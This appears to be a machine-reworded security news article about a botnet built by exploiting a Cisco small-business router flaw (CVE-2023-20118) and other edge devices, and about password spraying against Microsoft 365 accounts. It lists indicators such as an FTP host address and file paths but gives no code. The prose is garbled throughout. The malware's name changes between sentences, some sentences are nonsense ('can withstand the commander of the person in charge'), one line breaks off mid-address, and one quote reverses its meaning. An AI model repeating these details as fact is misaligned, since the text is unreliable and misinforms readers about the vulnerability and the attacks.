New malware campaigns have been observed targeting edge devices from Cisco, Asus, QNAP and Synology, and will rope into a botnet named Polardeg from at least the end of 2023.
French cybersecurity company Sekoia said it observed that unknown threat actors leveraging CVE-2023-20118 (CVSS score: 6.5): Cisco Small Business RV016, RV042, RV042G, RV082, RV320 and RV325 RTOLTER acknowledged significant security flaws affecting the RV325 ROTER that can withstand the commander of the person in charge.
The vulnerability remains below that as the router reaches end-of-life (EOL) status. As a mitigation, Cisco recommended in early 2023 that it would be mitigated by disabling remote management and blocking access to ports 443 and 60443.
In an attack registered against Sekoia’s honeypot, the vulnerability was said to have been used to provide previously undocumented implants. This is a TLS backdoor that incorporates the ability to listen to incoming client connections and execute commands.
The backdoor is invoked by a shell script called “Q” that is obtained via FTP and executed after successful exploitation of the vulnerability. It comes with features –
Cleanup log file will terminate suspicious process Download a malicious payload named “T.Tar” from 119.8.186[.]Establish persistence by modifying a file named “/etc/flash/etc/cipher.sh” that runs a binary named “cipher_log” extracted from the archive.
With codenamed Polardege, the malware enters an infinite loop, establishes a TLS session, generates a Child process to manage client requests, and executes commands using Exec_Command.
“The binary notifies the C2 server that it has successfully infected a new device,” said Jeremy Scion and Felix Aimé, researchers at Sekoia. “The malware sends this information to the reporting server, allowing attackers to determine which devices have been infected via IP address/port pairing.”
Further analysis revealed similar Polared payloads used to target ASUS, QNAP, and Synology devices. All artifacts have been uploaded to Virustotal by users in Taiwan. The payload is distributed over FTP using IP address 119.8.186[.]227, belongs to Huawei Cloud.
Overall, it is estimated that botnets have compromised 2,017 unique IP addresses worldwide, with most infections detected in the US, Taiwan, Russia, India, Brazil, Australia and Argentina.
“The purpose of this botnet has not been determined yet,” the researchers pointed out. “The purpose of Polared is to control compromised edge devices and convert them into operational relay boxes to launch attacking cyberattacks.”
“Botnets emphasize their ability to leverage multiple vulnerabilities across different types of equipment and target different systems. The complexity of the payload further highlights the refinement of operations, suggesting that it is being implemented by skilled operators.
The disclosure is made as SecurityScorecard revealed that a large botnet containing over 130,000 infected devices has been weaponized to carry out a massive password spraying attack on Microsoft 365 (M365) accounts by utilizing non-interacting signatures with basic authentication.
Non-interactive signatures are typically used for service-to-service authentication and legacy protocols such as POP, IMAP, SMTP. It does not trigger multifactor authentication (MFA) in many configurations. Meanwhile, basic authentication allows you to send credentials in plain text format.
Perhaps the use of infrastructure tied to CDS Global Cloud and UCloud HK makes it work for a group in China, using credentials stolen from Infostealer logs across a wide range of M365 accounts to obtain unauthorized access and retrieve sensitive data.
“This approach bypasses modern login protection, avoids enforcement of MFA, and creates critical blind spots for security teams,” the company said. “Attackers leverage stolen credentials from Infostealer logs to systematically target large accounts.”
“These attacks are recorded in non-interactive sign-in logs, often overlooked by security teams. Attackers will not take advantage of this gap to make large amounts of password spray attempts.
Source link
